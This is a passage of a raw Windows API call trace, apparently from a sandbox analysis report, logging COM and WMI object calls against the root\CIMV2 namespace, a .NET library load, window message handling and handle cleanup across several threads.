wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0xf2ef88) returned 0 [0144.596] WaitMessage () Thread: id = 2 os_tid = 0xff8 Thread: id = 3 os_tid = 0xffc Thread: id = 4 os_tid = 0x2f4 [0045.920] CoGetContextToken (in: pToken=0x2e1f7d8 | out: pToken=0x2e1f7d8) returned 0x800401f0 [0045.920] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0139.236] CoGetContextToken (in: pToken=0x2e1f7b8 | out: pToken=0x2e1f7b8) returned 0x0 [0139.236] CoGetContextToken (in: pToken=0x2e1f748 | out: pToken=0x2e1f748) returned 0x0 [0139.236] WbemLocator:IUnknown:Release (This=0x12687c8) returned 0x0 [0139.236] CoGetContextToken (in: pToken=0x2e1f748 | out: pToken=0x2e1f748) returned 0x0 [0139.236] WbemLocator:IUnknown:Release (This=0x12b74b8) returned 0x0 [0139.236] CoGetContextToken (in: pToken=0x2e1f748 | out: pToken=0x2e1f748) returned 0x0 [0139.236] WbemDefPath:IUnknown:Release (This=0x12b4650) returned 0x0 [0139.236] CoGetContextToken (in: pToken=0x2e1f7b8 | out: pToken=0x2e1f7b8) returned 0x0 [0139.237] IUnknown:QueryInterface (in: This=0x126b490, riid=0x7444db1c*(Data1=0x1da, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2e1f78c | out: ppvObject=0x2e1f78c*=0x126b4a0) returned 0x0 [0139.237] CObjectContext::ContextCallback () returned 0x0 [0141.112] IUnknown:Release (This=0x126b4a0) returned 0x1 [0141.112] IUnknown:Release (This=0x12b24a0) returned 0x0 [0141.112] IUnknown:Release (This=0x12b1fd8) returned 0x0 [0141.113] IUnknown:Release (This=0x12b27d0) returned 0x0 [0141.113] IUnknown:Release (This=0x12b2170) returned 0x0 [0141.125] IsWindow (hWnd=0x80084) returned 1 [0141.125] GetWindowThreadProcessId (in: hWnd=0x80084, lpdwProcessId=0x2e1f884 | out: lpdwProcessId=0x2e1f884) returned 0xfd0 [0141.311] GetExitCodeThread (in: hThread=0x42c, lpExitCode=0x2e1f880 | out: lpExitCode=0x2e1f880) returned 1 [0141.313] SendMessageTimeoutW (in: hWnd=0x80084, Msg=0xc167, wParam=0x0, lParam=0x0, fuFlags=0x2, uTimeout=0x64, lpdwResult=0x2e1f87c | out: lpdwResult=0x2e1f87c) returned 0x0 [0141.483] GetWindowLongW (hWnd=0x80084, nIndex=-4) returned 48696466 [0141.484] SetWindowLongW (hWnd=0x80084, nIndex=-4, dwNewLong=2007026336) returned 48696466 [0141.485] PostMessageW (hWnd=0x80084, Msg=0x10, wParam=0x0, lParam=0x0) returned 1 [0141.485] IUnknown:Release (This=0x12b2968) returned 0x0 [0141.485] CoGetContextToken (in: pToken=0x2e1f714 | out: pToken=0x2e1f714) returned 0x0 [0141.485] IUnknown:QueryInterface (in: This=0x126b490, riid=0x7444db1c*(Data1=0x1da, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2e1f6e8 | out: ppvObject=0x2e1f6e8*=0x126b4a0) returned 0x0 [0141.485] CObjectContext::ContextCallback () returned 0x0 [0144.568] IUnknown:Release (This=0x126b4a0) returned 0x1 [0144.568] CoGetContextToken (in: pToken=0x2e1f714 | out: pToken=0x2e1f714) returned 0x0 [0144.568] IUnknown:QueryInterface (in: This=0x126b490, riid=0x7444db1c*(Data1=0x1da, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2e1f6e8 | out: ppvObject=0x2e1f6e8*=0x126b4a0) returned 0x0 [0144.569] CObjectContext::ContextCallback () returned 0x0 [0144.571] IUnknown:Release (This=0x126b4a0) returned 0x1 [0144.571] IUnknown:Release (This=0x126b490) returned 0x0 [0144.572] CloseHandle (hObject=0x2c0) returned 1 [0144.572] GetLastError () returned 0x5b4 [0144.572] CloseHandle (hObject=0x424) returned 1 [0144.572] GetLastError () returned 0x5b4 [0144.572] CloseHandle (hObject=0x40c) returned 1 [0144.573] GetLastError () returned 0x5b4 [0144.573] CloseHandle (hObject=0x380) returned 1 [0144.573] GetLastError () returned 0x5b4 Thread: id = 5 os_tid = 0x85c [0046.952] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 Thread: id = 6 os_tid = 0x918 [0047.267] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 Thread: id = 7 os_tid = 0xd78 [0059.416] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0059.460] IIDFromString (in: lpsz="{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}", lpiid=0x78eeb94 | out: lpiid=0x78eeb94) returned 0x0 [0059.463] CoGetClassObject (in: rclsid=0x1290054*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x742d9630*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x78eeafc | out: ppv=0x78eeafc*=0x12686f8) returned 0x0 [0060.385] WbemDefPath:IUnknown:QueryInterface (in: This=0x12686f8, riid=0x744097d4*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x78ee92c | out: ppvObject=0x78ee92c*=0x0) returned 0x80004002 [0060.386] WbemDefPath:IClassFactory:CreateInstance (in: This=0x12686f8, pUnkOuter=0x0, riid=0x743703ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x78ee964 | out: ppvObject=0x78ee964*=0x1289cd8) returned 0x0 [0060.386] WbemDefPath:IUnknown:QueryInterface (in: This=0x1289cd8, riid=0x743703ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x78ee708 | out: ppvObject=0x78ee708*=0x1289cd8) returned 0x0 [0060.386] WbemDefPath:IUnknown:QueryInterface (in: This=0x1289cd8, riid=0x7438a6d0*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x78ee6c4 | out: ppvObject=0x78ee6c4*=0x0) returned 0x80004002 [0060.387] WbemDefPath:IUnknown:AddRef (This=0x1289cd8) returned 0x3 [0060.387] CoGetContextToken (in: pToken=0x78ee550 | out: pToken=0x78ee550) returned 0x0 [0060.387] CoGetObjectContext (in: riid=0x743703ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x129bbc4 | out: ppv=0x129bbc4*=0x126b548) returned 0x0 [0060.388] WbemDefPath:IUnknown:QueryInterface (in: This=0x1289cd8, riid=0x7429b034*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x78ee538 | out: ppvObject=0x78ee538*=0x12911d8) returned 0x0 [0060.388] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x12911d8, riid=0x743703ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x78ee540 | out: pCid=0x78ee540*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0060.388] WbemDefPath:IUnknown:Release (This=0x12911d8) returned 0x3 [0060.388] CoGetContextToken (in: pToken=0x78ee548 | out: pToken=0x78ee548) returned 0x0 [0060.388] WbemDefPath:IUnknown:AddRef (This=0x1289cd8) returned 0x4 [0060.388] WbemDefPath:IUnknown:QueryInterface (in: This=0x1289cd8, riid=0x743254dc*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x78ee5bc | out: ppvObject=0x78ee5bc*=0x0) returned 0x80004002 [0060.388] WbemDefPath:IUnknown:Release (This=0x1289cd8) returned 0x3 [0060.389] WbemDefPath:IUnknown:Release (This=0x1289cd8) returned 0x2 [0060.389] WbemDefPath:IUnknown:Release (This=0x12686f8) returned 0x0 [0060.389] WbemDefPath:IUnknown:Release (This=0x1289cd8) returned 0x1 [0060.389] SetEvent (hEvent=0x2c0) returned 1 [0060.389] GetLastError () returned 0x0 [0060.391] CoGetClassObject (in: rclsid=0x1290054*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x742d9630*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x78eeafc | out: ppv=0x78eeafc*=0x12686f8) returned 0x0 [0060.391] WbemDefPath:IUnknown:QueryInterface (in: This=0x12686f8, riid=0x744097d4*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x78ee92c | out: ppvObject=0x78ee92c*=0x0) returned 0x80004002 [0060.391] WbemDefPath:IClassFactory:CreateInstance (in: This=0x12686f8, pUnkOuter=0x0, riid=0x743703ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x78ee964 | out: ppvObject=0x78ee964*=0x128a058) returned 0x0 [0060.392] WbemDefPath:IUnknown:QueryInterface (in: This=0x128a058, riid=0x743703ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x78ee708 | out: ppvObject=0x78ee708*=0x128a058) returned 0x0 [0060.392] WbemDefPath:IUnknown:QueryInterface (in: This=0x128a058, riid=0x7438a6d0*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x78ee6c4 | out: ppvObject=0x78ee6c4*=0x0) returned 0x80004002 [0060.392] WbemDefPath:IUnknown:AddRef (This=0x128a058) returned 0x3 [0060.392] CoGetContextToken (in: pToken=0x78ee550 | out: pToken=0x78ee550) returned 0x0 [0060.392] WbemDefPath:IUnknown:QueryInterface (in: This=0x128a058, riid=0x7429b034*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x78ee538 | out: ppvObject=0x78ee538*=0x12914c0) returned 0x0 [0060.392] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x12914c0, riid=0x743703ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x78ee540 | out: pCid=0x78ee540*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0060.392] WbemDefPath:IUnknown:Release (This=0x12914c0) returned 0x3 [0060.392] CoGetContextToken (in: pToken=0x78ee548 | out: pToken=0x78ee548) returned 0x0 [0060.392] WbemDefPath:IUnknown:AddRef (This=0x128a058) returned 0x4 [0060.392] WbemDefPath:IUnknown:QueryInterface (in: This=0x128a058, riid=0x743254dc*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x78ee5bc | out: ppvObject=0x78ee5bc*=0x0) returned 0x80004002 [0060.392] WbemDefPath:IUnknown:Release (This=0x128a058) returned 0x3 [0060.393] WbemDefPath:IUnknown:Release (This=0x128a058) returned 0x2 [0060.393] WbemDefPath:IUnknown:Release (This=0x12686f8) returned 0x0 [0060.393] WbemDefPath:IUnknown:Release (This=0x128a058) returned 0x1 [0060.393] SetEvent (hEvent=0x380) returned 1 [0060.393] GetLastError () returned 0x36b7 [0065.171] CoGetClassObject (in: rclsid=0x1290054*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x742d9630*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x78eeafc | out: ppv=0x78eeafc*=0x12b7488) returned 0x0 [0065.172] WbemDefPath:IUnknown:QueryInterface (in: This=0x12b7488, riid=0x744097d4*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x78ee92c | out: ppvObject=0x78ee92c*=0x0) returned 0x80004002 [0065.172] WbemDefPath:IClassFactory:CreateInstance (in: This=0x12b7488, pUnkOuter=0x0, riid=0x743703ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x78ee964 | out: ppvObject=0x78ee964*=0x12b3f50) returned 0x0 [0065.172] WbemDefPath:IUnknown:QueryInterface (in: This=0x12b3f50, riid=0x743703ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x78ee708 | out: ppvObject=0x78ee708*=0x12b3f50) returned 0x0 [0065.172] WbemDefPath:IUnknown:QueryInterface (in: This=0x12b3f50, riid=0x7438a6d0*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x78ee6c4 | out: ppvObject=0x78ee6c4*=0x0) returned 0x80004002 [0065.172] WbemDefPath:IUnknown:AddRef (This=0x12b3f50) returned 0x3 [0065.172] CoGetContextToken (in: pToken=0x78ee550 | out: pToken=0x78ee550) returned 0x0 [0065.172] WbemDefPath:IUnknown:QueryInterface (in: This=0x12b3f50, riid=0x7429b034*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x78ee538 | out: ppvObject=0x78ee538*=0x1290878) returned 0x0 [0065.172] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1290878, riid=0x743703ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x78ee540 | out: pCid=0x78ee540*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0065.172] WbemDefPath:IUnknown:Release (This=0x1290878) returned 0x3 [0065.172] CoGetContextToken (in: pToken=0x78ee548 | out: pToken=0x78ee548) returned 0x0 [0065.172] WbemDefPath:IUnknown:AddRef (This=0x12b3f50) returned 0x4 [0065.173] WbemDefPath:IUnknown:QueryInterface (in: This=0x12b3f50, riid=0x743254dc*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x78ee5bc | out: ppvObject=0x78ee5bc*=0x0) returned 0x80004002 [0065.173] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x3 [0065.173] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x2 [0065.173] WbemDefPath:IUnknown:Release (This=0x12b7488) returned 0x0 [0065.173] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x1 [0065.173] SetEvent (hEvent=0x40c) returned 1 [0065.177] GetLastError () returned 0x36b7 [0065.344] CoGetClassObject (in: rclsid=0x1290054*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x742d9630*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x78eeafc | out: ppv=0x78eeafc*=0x12b7538) returned 0x0 [0065.345] WbemDefPath:IUnknown:QueryInterface (in: This=0x12b7538, riid=0x744097d4*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x78ee92c | out: ppvObject=0x78ee92c*=0x0) returned 0x80004002 [0065.345] WbemDefPath:IClassFactory:CreateInstance (in: This=0x12b7538, pUnkOuter=0x0, riid=0x743703ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x78ee964 | out: ppvObject=0x78ee964*=0x12b4650) returned 0x0 [0065.345] WbemDefPath:IUnknown:QueryInterface (in: This=0x12b4650, riid=0x743703ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x78ee708 | out: ppvObject=0x78ee708*=0x12b4650) returned 0x0 [0065.345] WbemDefPath:IUnknown:QueryInterface (in: This=0x12b4650, riid=0x7438a6d0*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x78ee6c4 | out: ppvObject=0x78ee6c4*=0x0) returned 0x80004002 [0065.345] WbemDefPath:IUnknown:AddRef (This=0x12b4650) returned 0x3 [0065.345] CoGetContextToken (in: pToken=0x78ee550 | out: pToken=0x78ee550) returned 0x0 [0065.345] WbemDefPath:IUnknown:QueryInterface (in: This=0x12b4650, riid=0x7429b034*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x78ee538 | out: ppvObject=0x78ee538*=0x1290ba8) returned 0x0 [0065.345] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1290ba8, riid=0x743703ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x78ee540 | out: pCid=0x78ee540*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0065.345] WbemDefPath:IUnknown:Release (This=0x1290ba8) returned 0x3 [0065.345] CoGetContextToken (in: pToken=0x78ee548 | out: pToken=0x78ee548) returned 0x0 [0065.345] WbemDefPath:IUnknown:AddRef (This=0x12b4650) returned 0x4 [0065.346] WbemDefPath:IUnknown:QueryInterface (in: This=0x12b4650, riid=0x743254dc*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x78ee5bc | out: ppvObject=0x78ee5bc*=0x0) returned 0x80004002 [0065.346] WbemDefPath:IUnknown:Release (This=0x12b4650) returned 0x3 [0065.346] WbemDefPath:IUnknown:Release (This=0x12b4650) returned 0x2 [0065.346] WbemDefPath:IUnknown:Release (This=0x12b7538) returned 0x0 [0065.346] WbemDefPath:IUnknown:Release (This=0x12b4650) returned 0x1 [0065.346] SetEvent (hEvent=0x424) returned 1 [0065.355] GetLastError () returned 0x36b7 Thread: id = 8 os_tid = 0xd70 Thread: id = 9 os_tid = 0xd68 Thread: id = 10 os_tid = 0xd3c Thread: id = 11 os_tid = 0xd30 [0060.411] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0060.413] IIDFromString (in: lpsz="{4590F811-1D3A-11D0-891F-00AA004B2E24}", lpiid=0x7deef70 | out: lpiid=0x7deef70) returned 0x0 [0060.413] CoGetClassObject (in: rclsid=0x127e2ec*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x742d9630*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x7deeed8 | out: ppv=0x7deeed8*=0x1290770) returned 0x0 [0060.492] WbemLocator:IUnknown:QueryInterface (in: This=0x1290770, riid=0x744097d4*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x7deed08 | out: ppvObject=0x7deed08*=0x0) returned 0x80004002 [0060.492] WbemLocator:IClassFactory:CreateInstance (in: This=0x1290770, pUnkOuter=0x0, riid=0x743703ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x7deed40 | out: ppvObject=0x7deed40*=0x12687c8) returned 0x0 [0060.492] WbemLocator:IUnknown:QueryInterface (in: This=0x12687c8, riid=0x743703ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x7deeae4 | out: ppvObject=0x7deeae4*=0x12687c8) returned 0x0 [0060.492] WbemLocator:IUnknown:QueryInterface (in: This=0x12687c8, riid=0x7438a6d0*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x7deeaa0 | out: ppvObject=0x7deeaa0*=0x0) returned 0x80004002 [0060.493] WbemLocator:IUnknown:AddRef (This=0x12687c8) returned 0x3 [0060.493] CoGetContextToken (in: pToken=0x7dee92c | out: pToken=0x7dee92c) returned 0x0 [0060.493] WbemLocator:IUnknown:QueryInterface (in: This=0x12687c8, riid=0x7429b034*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x7dee914 | out: ppvObject=0x7dee914*=0x0) returned 0x80004002 [0060.493] CoGetContextToken (in: pToken=0x7dee924 | out: pToken=0x7dee924) returned 0x0 [0060.493] WbemLocator:IUnknown:AddRef (This=0x12687c8) returned 0x4 [0060.493] WbemLocator:IUnknown:QueryInterface (in: This=0x12687c8, riid=0x743254dc*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x7dee998 | out: ppvObject=0x7dee998*=0x0) returned 0x80004002 [0060.493] WbemLocator:IUnknown:Release (This=0x12687c8) returned 0x3 [0060.493] WbemLocator:IUnknown:Release (This=0x12687c8) returned 0x2 [0060.493] WbemLocator:IUnknown:Release (This=0x1290770) returned 0x0 [0060.493] WbemLocator:IUnknown:Release (This=0x12687c8) returned 0x1 [0060.494] CoGetContextToken (in: pToken=0x7deee30 | out: pToken=0x7deee30) returned 0x0 [0060.494] CoGetContextToken (in: pToken=0x7deedf0 | out: pToken=0x7deedf0) returned 0x0 [0060.494] WbemLocator:IUnknown:AddRef (This=0x12687c8) returned 0x2 [0060.494] WbemLocator:IUnknown:QueryInterface (in: This=0x12687c8, riid=0x7deee6c*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x7deee68 | out: ppvObject=0x7deee68*=0x12687c8) returned 0x0 [0060.494] WbemLocator:IUnknown:Release (This=0x12687c8) returned 0x2 [0060.494] WbemLocator:IUnknown:Release (This=0x12687c8) returned 0x1 [0060.547] CoGetContextToken (in: pToken=0x7deeeac | out: pToken=0x7deeeac) returned 0x0 [0060.547] CoGetContextToken (in: pToken=0x7deee6c | out: pToken=0x7deee6c) returned 0x0 [0060.547] WbemDefPath:IUnknown:AddRef (This=0x1289cd8) returned 0x2 [0060.547] WbemDefPath:IUnknown:QueryInterface (in: This=0x1289cd8, riid=0x7deeee8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x7deeee4 | out: ppvObject=0x7deeee4*=0x1289cd8) returned 0x0 [0060.547] WbemDefPath:IUnknown:Release (This=0x1289cd8) returned 0x2 [0060.547] WbemDefPath:IUnknown:AddRef (This=0x1289cd8) returned 0x3 [0060.547] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1289cd8, puCount=0x7def060 | out: puCount=0x7def060*=0x2) returned 0x0 [0060.547] WbemDefPath:IUnknown:Release (This=0x1289cd8) returned 0x2 [0060.547] WbemDefPath:IWbemPath:GetText (in: This=0x1289cd8, lFlags=8, puBuffLength=0x7def05c*=0x0, pszText=0x0 | out: puBuffLength=0x7def05c*=0x15, pszText=0x0) returned 0x0 [0060.548] WbemDefPath:IWbemPath:GetText (in: This=0x1289cd8, lFlags=8, puBuffLength=0x7def05c*=0x15, pszText="00000000000000000000" | out: puBuffLength=0x7def05c*=0x15, pszText="\\\\LHNIWSJ\\root\\CIMV2") returned 0x0 [0060.554] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0x7dee208, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\", lpFilePart=0x0) returned 0x2e [0060.554] GetLastError () returned 0x0 [0060.556] LoadLibraryA (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\\\wminet_utils.dll") returned 0x73150000 [0060.660] 